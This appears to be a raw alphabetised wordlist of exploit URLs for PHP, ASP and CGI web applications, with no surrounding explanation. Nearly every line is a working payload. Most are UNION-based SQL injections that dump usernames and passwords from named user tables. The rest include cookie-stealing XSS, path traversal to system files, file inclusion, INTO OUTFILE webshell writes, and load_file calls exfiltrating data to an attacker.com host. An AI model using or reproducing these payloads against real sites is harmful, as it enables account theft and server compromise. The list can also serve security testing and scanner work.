  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web2_brugere
  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web3_brugere
  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web4_brugere
index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere
index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere
index2.php?id=6&catId=57&productId=-87%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,version%28%29,38,group_concat%28table_name%29,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20from%20information_schema.tables
index2.php?idfestival=7 (SQL)
index2.php [ID VARIABLE]
index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=
index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT 9999 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (9999=9999) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
index2.php?mosConfig_absolute_path=[shell script]
index2.php?option=com_airmonoblock&task=focus&id=1 and 1=0
index2.php?option=com_airmonoblock&task=focus&id=1 and 1=1
index2.php?option=com_cloner&mosmsg=
index2.php?option=com_cloner&mosmsg=<script>alert(document.cookie)<
index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
index2.php?option=com_prayercenter&task=view_request&id={SQL}
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]
index2.php?option=frontpage
index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer
index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type  ,user_name,user_pw),7,8,9,10+from+fastpublish__for  um_de_userdata
index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata
index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata
index2.php?sc=up1&ac=a1" method="post" enctype="multipart
index2.php?str_replace=[shell script]
index2.php?username=adsc&password=dac&option=com_cloner
index-3.html
index_48.htm].
index_51.htm
index_52.htm
index_55.htm
index_57.htm
index_59.htm
index_60.htm
index_63.htm
index_64.htm
index_72.htm
index_78.htm
indexadv
indexadv.class.php?system_path=[evil_scripts]
index-ajax.php?
index_album.php?P_INDEX=[Shell]
index_album.php?P_LIB=[Shell]
index (as it adds .php at the end)
index.asp
index.asp?tID=[SQL]
index.asp?view=archive&day=[SQL]
index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+
index.cfm?page=[SQL]
index.cgi
index.cgi?aktion=shopview&go=artikel&topid=1&subid=1'ERROR BASED INJECTION
index.cgi?backup_port=21&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%20width%3D800%20height%3D800%3E&locale=en_US&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&password=f232d3b35c04af128aa56e5913fd5292&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&user=guest&backup_life=5&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A%2F%2Fglobal-evolution.info%2Fetc%2Fbad-example.exe%3E&et=1261218005&primary_tab=ADVANCED&backup_type=ftp&auth_type=Local&secondary_tab=test_backup_server&iframe=stream_backup_test&content_only=1' marginHeight='1' marginWidth='1' height='300' frameborder='1' button_text='Stop' id='frame_results' ><
index.cgi?P1_Prod_Version=ShockwaveFlash"   
index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A
index.class.php?system_path=[evil_scripts]
indexdot
index.dot?id=..
index_eng.html
index.en.html
index_files
index_fm.php
indexFooter.php?path=<File Inclusion>%00
index_fr.html
index.htm
index.htm             *
index.htm				|
index.html
index.html>
index.html 
index.html                                                                                                                            
index.html                                #       
index.html             :
index.html  ]
index.html :
index.html?
index.html) <
index.html"  alt="Do you see this?" 
index.html<br>
index.html :<br>";
index.html:<br>";
index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 
index.html?download=-11111111+union+select+1,  #
index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;\\[host]\[share]\[file]%00;
index.html :\n";
index.html\r\n";
index.html :\r\n\r\n";
index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
index_ie.php?page=-666
index.inc.php?mytheme=
index.inc.php?REX[INCLUDE_PATH]=[inj3ct0r sh3ll]
index_inline_editor_submit.php" method="post">
index.jsp\
index.jsp#
index.jsp%00
index.jsp%20
index.jsp%5C
index_list.php?lang=%0d%0a%20ZSL%2dCustom%2dHeader%3alove_injection
index_list.php?lang="><script>alert(
index_long.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC
index_long.php?table_name=vendor&function=search&where_clause=[SQL INJECTION]&page=0&order=Address&order_type=ASC
index" method="post" name="main">
index_offer.php?page=..
index [ out of .php ]
"."index.php");
index.php
index.php<
index.php=
index.php 
index.php   
index.php                                         |
index.php                            #
index.php    		     			     |
index.php   	     			     |
index.php   	   				      |
index.php  ]
index.php?
index.php?'<
index.php?&
index.php',
index.php';
index.php';<
index.php"
index.php">
index.php",
index.php";
index.php";<
index.php")
index.php)
index.php]
index.php\">
index.php	|
index.php		         	                      |
index.php					     |
index.php					      |
index.php									    |
index\.php";
index.php%00
index.php%00'%20OR%20'1'='1
index.php'),1,1)='<',0,1))-- 1");
index.php3 
index.php3?action=telecharger&fichier=
index.php3?page=options&categorie=">
index.php?a=..
index.php?a=1030&b=~ID_NUMBER~&d=[SQL]
index.php?a=10 HTTP
index.php?a=11&b=0&c=><script>alert(
index.php?a=2&b=[SQL]
index.php?a=administrator&p=news&del=[ID]
index.php?a=administrator&p=news&s=add
index.php?abg_path=[shell]?
index.php?a=browse&area=[SQL]
index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null
index.php?abs_path=[shell]"
index.php?a=cp&s='><script>alert(document.cookie)<
index.php?ac=search
index.php?act=..
index.php?act=add
index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
index.php?act=Answer&cid=1&id=1&offset='
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members
index.php?act=Arcade&module=favorites&gameid=|aLMaSTeR 
index.php?act=article&id=-12+union+select+1,2,concat(name,0x3a,pwd),4+from+_authors--
index.php?act=article&id=[ SQLI ]
index.php?act=Attach&type=post&id=[SQL] 
index.php?act=blog&blogid=..
index.php?act=bmonth&m=12&yr=
index.php?act=calendar&code=birthdays&y=[any year]&m=[any month]&d='><script>alert(document.cookie)<
index.php?act=calendar&code=birthdays&y=[any year]&m='><script>alert(document.cookie)<
index.php?act=calendar&code=birthdays&y='><script>alert(document.cookie)<
index.php?act=cat&id=[Error Based Injection]
 index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)<
index.php?act=Help&CODE=[SQL] 
index.php?act=idx" style="text-decoration: none">
index.php?-action=..
index.php?action=..
index.php?action[]
index.php?action[]=1
index.php?-action=%27
index.php?action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00&section=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00&controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
index.php?action=%3Ch1%3E%3Cmarquee%3Ehalooo%3C
index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=..
index.php?action=add&cat_id=3 (Upload Page)
index.php?action=addphotos
index.php?action=add_template&id=themes" method="post">
index.php?action=add&transtype=|SQL]
index.php?action=admin"
index.php?action=admin;area=languages;sa=add;[token]
index.php?action=admin;area=logs;sa=errorlog;file=[BASE64 ENCODED FILE PATH];line=[LINE NUMBER]
index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==
index.php?action=admin;area=permissions;sa=modify2;group=0;pid=0" method="post">
index.php?action=admin;area=theme;sa=settings;th=2;[token]
index.php?action=advisories&id=27
index.php?action=attachment&file_name=%27
index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user
index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user
index.php?action=browse&cat=-29+UNION+SELECT+1,concat(adminusername,0x3e,adminpassword),3,4,5,6,7+FROM+siteconfig--
index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--
index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user
index.php?action=browse&cat=[SQL INj]
index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
index.php?action=buy_now&products_id=22%0d%0atest:%20poison%20headers!
index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
index.php?action=com&id='SQL_HERE
index.php?action=comments&do=save&id=1&cid=..
index.php?action=comments&id=[sq]
index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C
index.php?action=cust_order&pid=2%0d%0atest:%20poison%20headers! 
index.php?action=deadlink&idd=-1+union+select+1,2,version(),4,concat(user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
index.php?action=deconnexion" alt="Do you see this?" 
index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '
index.php?action=delete_poll&pid=[POLL
index.php?action=detailansicht&file_id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,benutzername,passwort,email),8+from+nns_user
index.php?action=details&cat=Content%20Management&id=1063623812
index.php?action=details&cat=Polls%20and%20Voting&id=1086552418  ]
index.php?action=details&id='SQL_HERE
index.php?action=DetailView&module=
index.php?action=DetailView&module=Leads&record=%3Cscript%3Ealert('document.cookie')%3C
index.php?action=displaycat&catid=1
index.php?action=displaycat&catid=1[SQL]
index.php?action=DisplayOverviewproduct&ParentCategory=[SQL]
index.php?action=doadd" method="post">
index.php?action=do_download&download_file=..
index.php?action=do_download&download_file=[ Read files ]&page=&section=pages
index.php?action=doeditnews&mod=editnews&title=<script>alert(
index.php?action=down_gbook_agb
index.php?action=downloadfile&filename=..
index.php?action=downloadfile&filename=index.php&directory=..
index.php?action=downloadfile&filename=[LFI]
index.php?action=download&id=1
index.php?action=editAwlItem&id=[SQLi]
index.php?action=edit&id=[sql]
index.php?action=edit&item=..
index.php?action=editsettings&profil_id=67" method="post" ....etc >
index.php?action=editsettings&profil_id=67" method="post" name="editsettings" id="editsettings">
index.php?action=edit&start=0&transtype=1&entry=|SQL|
index.php?action=edittemplate&field=title'<script>a=
index.php?action_file=file.type%00                                  #
index.php?action=gallery.list&id_gallery=5
index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=4	# FALSE
index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=5	# TRUE
index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--
index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--
index.php?action=genre&id=2'
index.php?action=getsearch&orderby=dateposted&searchquery=')
index.php?action=getTemplate
index.php?action=imprefs
index.php?action=index&day=22&hour=0&module=Calendar&month=7&onlyforuser=1%20%20UNION%20SELECT%201,2,3,4,5,6,version%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,1,22,23,24,25,26,27,28,29,30,31,32%20--%20&parenttab=My%20Home%20Page&subtab=event&view=day&viewOption=hourview&year=2013
index.php?action=Information&informationID=[SQL]
index.php?action=kategorien&kategorie=-1'+union+select+1,2,user(),concat_ws(0x3a,benutzername,passwort,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+nns_user
index.php?action=kb&article=[r0t]
index.php?action=kb&print=[r0t]
index.php?action=[LFI]
index.php?action=list&order=name&srt=yes
index.php?-action=list&-table=%27
index.php?-action=list&-table=%3Cscript%3Ealert
index.php?-action=list&-table=%3Cscript%3Ealert%28
index.php?action=[Local File]%00
index.php?action=login
index.php?action=login&lastaction=&lastkey=&loginout=2
index.php?action=newsadmindel&file_id=[SQL]
index.php?action=news;board=1;
index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
index.php?action=news_list&display_num=[sql]
index.php?action=news_list&sortorder=[sql] 
index.php?action=order
index.php?action=packages;sa=install2;package=[filename] (1)
index.php?action=playgame&gameid=[SQL INj]
index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
index.php?action=play&id=[sql]
index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
index.php?action=plugin&name=gallery&type=album&id=[SQLi]
index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
index.php?action=plugin&name=gallery&type=item&id=[SQLi]
index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + "; 1102461922=1; -1283274824=1;"})
index.php?action=post&forumid=3'
index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui :)
index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no  :)
index.php?action=postnew&board_id=1
index.php?action=postnewsubmit&board_id=1 HTTP
index.php?action=profil.main&xid=1
index.php?action=profil.main&xid=[SQLi]
index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin
index.php?action=readmore&id=-1%20union%20select%200,1,@@version,3
index.php?action=readmore&id=-1+union+select+1,version(),3,4+from+admin--
index.php?action=readmore&id=(SQL c0de)
index.php?action=registernew
index.php?action=rssfeed&type=entry&sys-name=%27
index.php?action=save_search   < note some parameter set by passed url >
index.php?action=SaveSQL
index.php?action=search" method="post">
index.php?action=search&query=<script>alert(document.cookie)<
index.php?action=search&searchFor="><script>alert("test")<
index.php?action=search&where=3&searchGo=1&table=minibbtable_posts
index.php?action=search&where=3&searchGo=1&table=[SQL]
index.php?action=sendto&newsid=1%27%20and%20%272%27=%272
index.php?action=settingsedit"><script>alert(document.cookie)<
index.php?action=showall_by_tags&tag=%27%22--%3E%3C
index.php?action=show&articleId=99999%27union
index.php?action=showcat&cid=8&sid="
index.php?action=show_comment&post=%27
index.php?action=showgal&cat=5&page=[SQLi]
index.php?action=showgal&cat=[Sql]
index.php?action=showkat&id=1+and+1=1--+
index.php?action=showkat&id=1+and+1=2--+
index.php?action=showpic&cat=1&pic=[Sql]
index.php?action=showpic&cat=8&pic=59&pic=-1
index.php?action=show&view=votings&link=20000
index.php?action=show&view=votings&link=$number of links .
index.php?action=template&template=..
index.php?action=template&template=[LFI]
index.php?action=top&show=5&type='><script>alert(d ocument.cookie)<
index.php?action=top&show=5&type=[SQL] 
index.php?action=top&show='><script>alert(document .cookie)<
index.php?action=top&show=[SQL]&type=Artists
index.php?action=UnifiedSearch&module=Home&pa
index.php?action=upload
index.php?action=upload&order=name&srt=yes
index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users
index.php?action=userlogin7375e"><script>alert(1)<
index.php?action=userpic&do=upload'
index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--
index.php?action=view_article&module=articlemodule&id= SQL INJECTION
index.php?action=viewboard&board_id=1'
index.php?action=ViewCategories&cat=[SQL] 
index.php?action=view&filename=..
index.php?action=ViewGroups&grp=[SQL]
index.php?action=view&id=2&module=<h1>Tes<
index.php?action=view&id=[BlindSQLi]
index.php?action=view_saved_searches  to view result
index.php?action=view&sys-name=%27
index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
index.php?action=vote&insert='SQL_HERE 
index.php?action=vote&link=20000
index.php?action=vote&link=800
index.php?action=vote&link=$number of links
index.php?active_project=0&ajax=true&c=account&a=edi
index.php?act=ketqua&code=showcat&idcat=[SQL] 
index.php?act=ketqua&code=[SQL] 
index.php?act=[ LFI ]%00&id=12
index.php?act=license&id=2
index.php?act=login
index.php?act=Login&CODE=[SQL] 
index.php?act=login&func=captcha&s=\
index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201
index.php?act=Mail&CODE=00&MID='><script>alert(document.cookie)<
index.php?act=Members&max_results=10&sort_key=posts&sort_order='><script>alert(document.cookie)<
index.php?act=Members&max_results=10&sort_key='><script>alert(document.cookie)<
index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION 
index.php?act=Members&max_results='><script>alert(document.cookie)<
index.php?act=module&module=gallery&cmd=editcomment&comment=
index.php?act=Msg&CODE=04&MODE=1&entered_name=Woody&msg_title=hi&Post=I%20love%20you!">
index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1
index.php?act=page&id=999999999%27union
index.php?act=play&id=122' (MySQLi Found)
index.php?act=plugin&id=4
index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection]
index.php?act=PostCODE=02f=4t=3qpid='[SQL] 
index.php?act=Print&client=printer&f=1&t='><script>alert(document.cookie)<
index.php?act=product&po=detil&id=3
index.php?act=Profile&CODE=[SQL] 
index.php?act=ptopic&fid=1"
index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E 
index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
index.php?act=Question&id=1&orderby='&order=DESC&limit=10
index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
index.php?act=Question&id=1&orderby=q_id&order='&limit=10
index.php?act=ref&id=[SQL]
index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert
index.php?act=register2 with:
index.php?act=reputation&fid=5&pid=|SQL|
index.php?act='><script>alert(document.cookie)<
index.php?act=Search&code=01&search_item='
index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie)<
index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in='><script>alert(document.cookie)<
index.php?act=Search&nav='><script>alert(document.cookie)<
index.php?act=search&process HTTP
index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users
index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4 
index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4
index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
index.php?act=task&ck=&#039;
index.php?act=task&task=.
index.php?act=usercp&p=email
index.php?act=usercp&p=email) 
index.php?act=usercp&p=email HTTP
index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]
index.php?act=view&id=8    :
index.php?act=viewProd&productId=20
index.php?act=viewProd&productId=2 it cost 50$ :)
index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1 
index.php?acuparam=>'><ScRiPt>alert(435038069432)<
index.php?add_ip=<?phpinfo();?>&action=add&mod=ipban
index.php?add_to_cart=10&prod_rn=271 AND (SELECT(IF(0x41=0x41, BENCHMARK(9999999999,NULL),NULL)))
index.php?adduser=true&lang=[LFI]
index.php?adduser=true&lang=[RFI]
index.php?a=d&id=
index.php?a=d&id=-11111111111+union+select
index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
index.php admin
index.php?admin=..
index.php","admin=1&user=dark");
index.php (Admin Aera)
index.php?admin=changepass" method="post">
index.php admin cwhpass\n";
index.php?admin_email=[SQL Injection]
index.php','admin=false&admin2=77.php&datafromuser=','<td>\w{32}<
index.php (Admin information)
index.php?adminloggedin=1&loggedin=1&level=1
index.php?admin&module=..
index.php?admin&module=game&mode=newsave" method="POST" enctype="multipart
index.php?admin=my_account" method="post">
index.php?admin=static_pages_edit&pk=home" method="post" name="main">
index.php?advanced=yes\r\n";
index.php?affiche=Forum-read_mess&id=' 
index.php?afis=browse&s=[SQL]
index.php?afis=profil&pg=[SQL]
index.php?afis=SelCupidonNoLog&sortb=[SQL]
index.php?a=forum&f='%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?a=forum&f='><script>alert(document.cookie)<
index.php?_a=knowledgebase&_j=questiondetails&_i=[SQL]
index.php?_a=knowledgebase&_j=rate&_i=[SQL]&type=no
index.php?_a=knowledgebase&_j=search&searchm=[CODEGOESHERE]
index.php?_a=knowledgebase&_j=subcat&_i=[SQL]
index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>
index.php?album=[html]
index.php?AlbumId=3+AND+1=0%23 --> title is not displayed (false)
index.php?AlbumId=3+AND+1=1%23 --> title is displayed (true)
index.php?AlbumId=".$AlbumID;
index.php?album=[LFI]%00
index.php?album=[SQL]
index.php?album=[sqli]
index.php?album=[urlredirection]
index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?a=listings&mode=1&order=name&cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?a=listings&mode='SQL_INJECTION&order=name&cat=
index.php?allres=1&op=search&rvalue=1&sortby=SQL_INJECTION&submit=Find&type=scantime&withoutmenu=1
index.php?allres=1&op=search&rvalue=SQL_INJECTION&sortby=&submit=Find&type=scantime&withoutmenu=1
index.php?a=lostpw&set=1&id=`
index.php?a=lostpw&set=1&session_id=` 
index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23
index.php?a=members&l='><script>alert(document.cookie)<
index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
index.php?a=myareas&area=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php and login to the control panel...";
index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4
index.php and register and then u can test like this :
index.php" and then
index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users
index.php?a=pm&s='><script>alert(document.cookie)<
index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)<
index.php?a=pm&s=send&to='><script>alert(document.cookie)<
index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20
index.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%20=%20CHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null%20FROM%20mb_users%20WHERE%20user_group%20=%201
index.php?a=post&s=reply&t=1&qu=10000%20UNION
index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201
index.php?a=post&s=reply&t='><script>alert(document.cookie)<
index.php?a=post&s='><script>alert(document.cookie)<
index.php?app=..
index.php?app=arcade-games&action=games&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users
index.php?app=arcade-games&action=games&id=-1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5,6%20from%20users
index.php?app=blog&action=saveitem (vulnerable: 6, 7)
index.php?app=contacts&action=saveitem HTTP
index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=
index.php?app=core&module=globalion=register
index.php?app=core&module=global&section=like
index.php? app=core&module=global&section=register
index.php?app=core&module=global&section=register&any= ? section = ..
index.php?app=core&module=searchion=search&do=quick_search&search_app[]= 		 	   		  
index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27
index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 
index.php?app=menus&action=savecategory
index.php?app_path=[inj3ct0r sh3ll]
index.php?app=profile-codes&action=codes&id=-1%20union%20select%201,2,concat(id,0x3a,username,0x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20users
index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
index.php?app=users&action=savecategory HTTP
index.php?app=users&action=saveitem HTTP
index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27
index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 
